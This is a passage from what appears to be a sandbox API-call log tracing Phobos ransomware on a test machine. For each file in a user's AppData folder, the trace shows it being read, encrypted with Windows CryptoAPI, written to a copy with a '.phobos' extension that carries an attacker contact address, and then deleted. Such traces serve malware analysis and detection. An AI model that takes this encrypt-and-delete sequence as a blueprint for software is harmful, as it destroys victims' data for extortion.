(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini")) returned 0x2020 [0195.498] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.498] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.498] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.557] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.557] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.557] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x6f, lpOverlapped=0x0) returned 1 [0195.560] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70, dwBufLen=0x70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x70) returned 1 [0195.560] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x70, lpOverlapped=0x0) returned 1 [0195.560] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0195.560] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.560] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.560] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.561] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.561] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.561] CloseHandle (hObject=0xb8) returned 1 [0195.561] CloseHandle (hObject=0xac) returned 1 [0195.562] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini")) returned 1 [0195.563] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OuK6eX rKBYffUyn.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouk6ex rkbyffuyn.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.563] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=4351) returned 1 [0195.564] CloseHandle (hObject=0xac) returned 1 [0195.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OuK6eX rKBYffUyn.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouk6ex rkbyffuyn.flv")) returned 0x2020 [0195.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OuK6eX rKBYffUyn.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouk6ex rkbyffuyn.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OuK6eX rKBYffUyn.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouk6ex rkbyffuyn.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.564] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.564] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OuK6eX rKBYffUyn.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouk6ex rkbyffuyn.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.565] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.565] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.565] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10ff, lpOverlapped=0x0) returned 1 [0195.642] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1100, dwBufLen=0x1100 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1100) returned 1 [0195.642] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1100, lpOverlapped=0x0) returned 1 [0195.643] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.643] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.643] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0195.643] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.643] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0195.643] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.643] CloseHandle (hObject=0xac) returned 1 [0195.643] CloseHandle (hObject=0xb8) returned 1 [0195.643] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OuK6eX rKBYffUyn.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ouk6ex rkbyffuyn.flv")) returned 1 [0195.645] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\VYOzyWVCK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vyozywvck.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.646] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=35799) returned 1 [0195.646] CloseHandle (hObject=0xb8) returned 1 [0195.646] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\VYOzyWVCK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vyozywvck.gif")) returned 0x2020 [0195.646] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\VYOzyWVCK.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vyozywvck.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\VYOzyWVCK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vyozywvck.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.646] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.646] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\VYOzyWVCK.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vyozywvck.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.653] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.653] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.653] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8bd7, lpOverlapped=0x0) returned 1 [0195.655] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8be0, dwBufLen=0x8be0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8be0) returned 1 [0195.655] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8be0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8be0, lpOverlapped=0x0) returned 1 [0195.657] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.657] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.657] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.657] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.657] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.657] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.657] CloseHandle (hObject=0xb8) returned 1 [0195.657] CloseHandle (hObject=0xac) returned 1 [0195.657] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\VYOzyWVCK.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vyozywvck.gif")) returned 1 [0195.658] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\w1MdTT4Wxq.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\w1mdtt4wxq.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.660] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=45288) returned 1 [0195.660] CloseHandle (hObject=0xac) returned 1 [0195.660] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\w1MdTT4Wxq.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\w1mdtt4wxq.swf")) returned 0x2020 [0195.660] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\w1MdTT4Wxq.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\w1mdtt4wxq.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\w1MdTT4Wxq.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\w1mdtt4wxq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.660] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.660] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\w1MdTT4Wxq.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\w1mdtt4wxq.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.661] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.661] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.661] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb0e8, lpOverlapped=0x0) returned 1 [0195.663] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0f0, dwBufLen=0xb0f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0f0) returned 1 [0195.663] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0f0, lpOverlapped=0x0) returned 1 [0195.665] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.665] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.665] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.665] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.665] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.665] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.665] CloseHandle (hObject=0xac) returned 1 [0195.665] CloseHandle (hObject=0xb8) returned 1 [0195.665] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\w1MdTT4Wxq.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\w1mdtt4wxq.swf")) returned 1 [0195.666] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wAudKXbcuY7SjiMuiS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\waudkxbcuy7sjimuis.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.667] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=35633) returned 1 [0195.667] CloseHandle (hObject=0xb8) returned 1 [0195.667] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wAudKXbcuY7SjiMuiS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\waudkxbcuy7sjimuis.m4a")) returned 0x2020 [0195.668] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wAudKXbcuY7SjiMuiS.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\waudkxbcuy7sjimuis.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wAudKXbcuY7SjiMuiS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\waudkxbcuy7sjimuis.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.668] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.668] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wAudKXbcuY7SjiMuiS.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\waudkxbcuy7sjimuis.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.669] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.669] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.669] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x8b31, lpOverlapped=0x0) returned 1 [0195.671] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8b40, dwBufLen=0x8b40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8b40) returned 1 [0195.671] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8b40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8b40, lpOverlapped=0x0) returned 1 [0195.673] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.673] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.673] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0195.673] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.673] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0195.673] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.673] CloseHandle (hObject=0xb8) returned 1 [0195.673] CloseHandle (hObject=0xac) returned 1 [0195.673] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wAudKXbcuY7SjiMuiS.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\waudkxbcuy7sjimuis.m4a")) returned 1 [0195.674] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wpS2V9tUZkF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wps2v9tuzkf.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.676] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=17440) returned 1 [0195.676] CloseHandle (hObject=0xac) returned 1 [0195.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wpS2V9tUZkF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wps2v9tuzkf.flv")) returned 0x2020 [0195.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wpS2V9tUZkF.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wps2v9tuzkf.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wpS2V9tUZkF.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wps2v9tuzkf.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.676] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.676] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 